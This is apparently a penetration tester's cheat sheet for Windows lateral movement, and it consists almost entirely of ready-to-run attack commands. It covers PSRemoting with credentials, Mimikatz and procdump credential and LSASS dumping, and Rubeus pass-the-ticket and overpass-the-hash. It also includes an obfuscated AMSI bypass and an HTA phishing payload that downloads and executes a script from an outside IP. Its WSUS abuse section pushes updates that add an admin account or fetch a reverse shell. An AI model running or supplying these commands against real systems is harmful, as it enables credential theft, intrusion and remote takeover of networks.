Lateral Movement

PSRemoting

PSRemoting Session

New-PSSession -ComputerName Target1
Enter-PSSession -ComputerName Target1

# Set trusted hosts to psremote to IP rather than hostname
winrm set winrm/config/client ‘@{TrustedHosts="*"}’

# Connect with local admin creds
enter-pssession 192.168.144.100 -Authentication Negotiate -Credential $cred

Pass Creds

# If you have RDP access and can get a prompt
$cred = Get-Credential Domain\Username
invoke-command -Credential $cred -computername x -scriptblock {whoami}

# If you are over C2 and cant get a prompt
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami}

PSRemoting Invoke-Command

# Execute Commands or script blocks:
Invoke-Command –Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>) 

# Execute scripts from files:
Invoke-Command –FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)

# Execute locally loaded function on the remote machines:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)

# Pass arguments:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) ArgumentList

# Function call within script is used:
Invoke-Command –Filepath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)

# Execute stateful commands:
$Sess = New-PSSession –Computername Server1
Invoke-Command –Session $Sess –ScriptBlock {$Proc = Get-Process}
Invoke-Command –Session $Sess –ScriptBlock {$Proc.Name}

Stateful Mimikatz

$sess = new-pssession -computername server1
Invoke-Command -session $sess -scriptblock {sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )}
Invoke-Command -session $sess -Filepath C:\Tools\Invoke-Mimikatz.ps1
Enter-PSSession -session $sess

Invoke-Mimikatz

# Dump Creds on local machine
Invoke-Mimikatz -DumpCreds

# Dump creds on multiple machines
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1", "sys2") 

# "Over pass the hash" generate tokens from hashes
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.LOCAL /ntlm:<ntlmhash> /run:powershell.exe"'

Double Hop Problem

PowerShell

$cred = Get-Credential DOMAIN\USER

# Execute commands
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname}}

# Copy files
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item .\procdump64.exe -Destination "C:\Documents\" -ToSession $sess2}

# Dump
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname; .\procdump64.exe -accepteula -ma lsass.exe lsass.dmp}}

# Copy dump back
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item "C:\Documents\lsass.dmp" -Destination "C:\Documents\" -FromSession $sess2}

can use rubeus over double hop to extrat ticket then interact with 3rd system:
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname;.\Rubeus.exe ptt /ticket:doI<snip>AYArt ; ls \\COMP3\c$\}}

PsExec / Rubeus

# psexec to first host
Psexec.exe -accepteula \\COMP -u USER -p <password> cmd

# Use rubeus on first host to overpass the hash and then access second host.
# NOTE: using the /domain flag makes it unreliable.
Rubeus.exe asktgt /user:USER /rc4:<hash> /ptt

Phish

# Generate HTA
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>

# Send Email
Send-MailMessage -From 'User01 <user01@fabrikam.com>' -To 'User02 <user02@fabrikam.com>' -Subject 'Test mail' -SmtpServer AC-ITSTAFF

# use Nishang to generate powershell phish payloads

Pass-The-Hash

runas /noprofile /netonly /user:<domain\username> powershell.exe

Rubeus.exe asktgt /user:USER /rc4:<hash> /ptt

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:<ntlmhash> /run:powershell.exe"'

PsExec

WSUS

Enumeration

# If you compromise a wsus server you can own a lot 

# See which comps connecting for updates (port 8530 = http, port 8531 = https)
netstat -ano 

Abuse

https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1

# Load psexec into directory and WSUSpendu

# Send out malicious update to gain local admin on machine 
Wsuspendu.ps1 -Inject -PayloadFile psexec.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user Titi Password123_ /add && net localgroup Administrators Titi /add"' -ComputerName Win7.test.net

# Compromise isolated networks with a reverse shell
# Where Script is an amsi bypass plus a reverse shell connecting over 8531
.\Wsuspendu.ps1 -Inject -PayloadFile .\psexec.exe -PayloadArgs '-accepteula -s -d powershell.exe -c "wget http://IP2:8531/Reverse.ps1 -UseBasicParsing -OutFile .\Reverse.ps1;.\Reverse.ps1"' -ComputerName <targetComp>

# Listen on host and wait 
powercat -l -v -p 8531

Last updated